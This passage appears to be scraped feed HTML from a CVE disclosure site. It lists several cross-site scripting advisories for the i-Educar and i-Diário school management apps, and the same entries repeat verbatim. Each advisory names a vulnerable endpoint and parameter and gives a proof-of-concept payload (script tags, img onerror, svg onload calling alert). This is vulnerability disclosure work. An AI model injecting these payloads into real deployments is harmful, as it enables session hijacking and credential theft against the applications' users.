tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">svg</span> <span class="na">onload</span><span class="o">=</span><span class="s">alert(12)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8509/image.png" width="854" height="673" srcset="/p/cve-2025-8509/image_hu_92b37feeb3dbded9.png 480w, /p/cve-2025-8509/image_hu_6146d3e89a533279.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="126" data-flex-basis="304px" /></p> <p style="text-align: justify;">On <code>/intranet/educar_servidor_det.php?cod_servidor=28915&ref_cod_instituicao=1</code> page click on <code>"Editar"</code> button.</p> <p><img src="/p/cve-2025-8509/image-1.png" width="846" height="354" srcset="/p/cve-2025-8509/image-1_hu_f1e1a80ba93b939e.png 480w, /p/cve-2025-8509/image-1_hu_fe73307a5bce70dc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="573px" /></p> <p style="text-align: justify;">This payload was submitted through the matricula field and successfully stored. Upon accessing the affected content, the JavaScript executes immediately in the context of the victim’s browser.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8509.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8509.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 03 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8511/ https://www.cvehunters.com/p/cve-2025-8511/ <h2 id="cve-2025-8511-cross-site-scripting-xss-stored-endpoint-diario-de-observacoesid-parameter-observações--descrição">CVE-2025-8511: Cross-Site Scripting (XSS) Stored endpoint <code>/diario-de-observacoes/[ID]</code> parameter <code>Observações > Descrição</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8511" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8511</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/diario-de-observacoes/[ID]</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Observações > Descrição</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-8511-cross-site-scripting-xss-stored-endpoint-diario-de-observacoesid-parameter-observações--descrição">CVE-2025-8511: Cross-Site Scripting (XSS) Stored endpoint <code>/diario-de-observacoes/[ID]</code> parameter <code>Observações > Descrição</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8511" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8511</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/diario-de-observacoes/[ID]</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Observações > Descrição</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/diario-de-observacoes/[ID]</code></p> <p>Parameter: <code>Observações > Descrição</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Observações > Descrição</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8511/image.png" width="911" height="898" srcset="/p/cve-2025-8511/image_hu_f881a20290b02ea9.png 480w, /p/cve-2025-8511/image_hu_77597c0c3a04f49b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="101" data-flex-basis="243px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8511.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8511.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 03 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8346/ https://www.cvehunters.com/p/cve-2025-8346/ <h2 id="cve-2025-8346-cross-site-scripting-xss-reflected-endpoint-educar_aluno_lstphp-via-ref_cod_matricula-parameter">CVE-2025-8346: Cross-Site Scripting (XSS) Reflected endpoint <code>educar_aluno_lst.php</code> via <code>ref_cod_matricula</code> parameter </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8346" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8346</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_aluno_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>ref_cod_matricula</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_aluno_lst.php</code></p> <p>Parameter: <code>ref_cod_matricula</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span><span class="o">%</span><span class="mi">20</span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="o">%</span><span class="mi">20</span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="o">%</span><span class="mi">27</span><span class="nx">CVE</span><span class="o">-</span><span class="nx">Hunters</span><span class="o">%</span><span class="mi">27</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8346/image.png" width="2226" height="1408" srcset="/p/cve-2025-8346/image_hu_4ad20b410643cee4.png 480w, /p/cve-2025-8346/image_hu_8466039bf764aed0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="158" data-flex-basis="379px" ></p> <h3 id="full-payload">Full Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> https://localhost/intranet/educar_aluno_lst.php?ref_cod_matricula="><span class="p"><</span><span class="nt">img</span><span class="err">%</span><span class="na">20src</span><span class="o">=</span><span class="s">x%20onerror=alert(%27CVE-Hunters%27)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-8346-cross-site-scripting-xss-reflected-endpoint-educar_aluno_lstphp-via-ref_cod_matricula-parameter">CVE-2025-8346: Cross-Site Scripting (XSS) Reflected endpoint <code>educar_aluno_lst.php</code> via <code>ref_cod_matricula</code> parameter </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8346" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8346</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_aluno_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>ref_cod_matricula</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_aluno_lst.php</code></p> <p>Parameter: <code>ref_cod_matricula</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span><span class="o">%</span><span class="mi">20</span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="o">%</span><span class="mi">20</span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="o">%</span><span class="mi">27</span><span class="nx">CVE</span><span class="o">-</span><span class="nx">Hunters</span><span class="o">%</span><span class="mi">27</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8346/image.png" width="2226" height="1408" srcset="/p/cve-2025-8346/image_hu_4ad20b410643cee4.png 480w, /p/cve-2025-8346/image_hu_8466039bf764aed0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="158" data-flex-basis="379px" /></p> <h3 id="full-payload">Full Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> https://localhost/intranet/educar_aluno_lst.php?ref_cod_matricula="><span class="p"><</span><span class="nt">img</span><span class="err">%</span><span class="na">20src</span><span class="o">=</span><span class="s">x%20onerror=alert(%27CVE-Hunters%27)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8346.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8346.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8365/ https://www.cvehunters.com/p/cve-2025-8365/ <h2 id="cve-2025-8365-multiples-cross-site-scripting-xss-stored-in-endpoint-atendidos_cadphp">CVE-2025-8365: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>atendidos_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8365" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8365</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>atendidos_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code>, <code>nome_social</code> and <code>email</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-8365-multiples-cross-site-scripting-xss-stored-in-endpoint-atendidos_cadphp">CVE-2025-8365: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>atendidos_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8365" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8365</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>atendidos_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code>, <code>nome_social</code> and <code>email</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>atendidos_cad.php</code></p> <p>Parameters: <code>nome</code>, <code>nome_social</code> and <code>email</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code>, <code>nome_social</code> and <code>email</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8365/image.png" width="1229" height="332" srcset="/p/cve-2025-8365/image_hu_cfca56083774b524.png 480w, /p/cve-2025-8365/image_hu_3fab16a5d252a9b8.png 1024w" loading="lazy" alt="Parameter nome" class="gallery-image" data-flex-grow="370" data-flex-basis="888px" /></p> <p><img src="/p/cve-2025-8365/image-1.png" width="1208" height="350" srcset="/p/cve-2025-8365/image-1_hu_4f88faef3bff0085.png 480w, /p/cve-2025-8365/image-1_hu_a097317291baef5.png 1024w" loading="lazy" alt="Parameter nome_social" class="gallery-image" data-flex-grow="345" data-flex-basis="828px" /></p> <p><img src="/p/cve-2025-8365/image-2.png" width="1229" height="342" srcset="/p/cve-2025-8365/image-2_hu_23eddbd5b1dbebb0.png 480w, /p/cve-2025-8365/image-2_hu_7c7b2bc555309126.png 1024w" loading="lazy" alt="Parameter email" class="gallery-image" data-flex-grow="359" data-flex-basis="862px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8365.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8365.md</a></p> <h2 id="finder">Finder: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8366/ https://www.cvehunters.com/p/cve-2025-8366/ <h2 id="cve-2025-8366-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_servidor_lstphp">CVE-2025-8366: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_servidor_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8366" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8366</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_servidor_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> and <code>matricula_sevidor</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_servidor_lst.php</code></p> <p>Parameters: <code>nome</code> and <code>matricula_sevidor</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8366/image.png" width="863" height="1056" srcset="/p/cve-2025-8366/image_hu_6199b9aaaa300864.png 480w, /p/cve-2025-8366/image_hu_e3f7025ac01bf0a0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="81" data-flex-basis="196px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-8366-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_servidor_lstphp">CVE-2025-8366: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_servidor_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8366" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8366</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_servidor_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> and <code>matricula_sevidor</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_servidor_lst.php</code></p> <p>Parameters: <code>nome</code> and <code>matricula_sevidor</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8366/image.png" width="863" height="1056" srcset="/p/cve-2025-8366/image_hu_6199b9aaaa300864.png 480w, /p/cve-2025-8366/image_hu_e3f7025ac01bf0a0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="81" data-flex-basis="196px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8366.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8366.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8367/ https://www.cvehunters.com/p/cve-2025-8367/ <h2 id="cve-2025-8367-cross-site-scripting-xss-reflected-in-endpoint-funcionario_vinculo_lstphp-parameter-nome">CVE-2025-8367: Cross-Site Scripting (XSS) Reflected in endpoint <code>funcionario_vinculo_lst.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8367" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8367</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>funcionario_vinculo_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>funcionario_vinculo_lst.php</code></p> <p>Parameter: <code>nome</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8367/image.png" width="847" height="702" srcset="/p/cve-2025-8367/image_hu_facf55028aaff81d.png 480w, /p/cve-2025-8367/image_hu_e1b6305ab119a43a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="120" data-flex-basis="289px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-8367-cross-site-scripting-xss-reflected-in-endpoint-funcionario_vinculo_lstphp-parameter-nome">CVE-2025-8367: Cross-Site Scripting (XSS) Reflected in endpoint <code>funcionario_vinculo_lst.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8367" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8367</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>funcionario_vinculo_lst.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>funcionario_vinculo_lst.php</code></p> <p>Parameter: <code>nome</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8367/image.png" width="847" height="702" srcset="/p/cve-2025-8367/image_hu_facf55028aaff81d.png 480w, /p/cve-2025-8367/image_hu_e1b6305ab119a43a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="120" data-flex-basis="289px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to 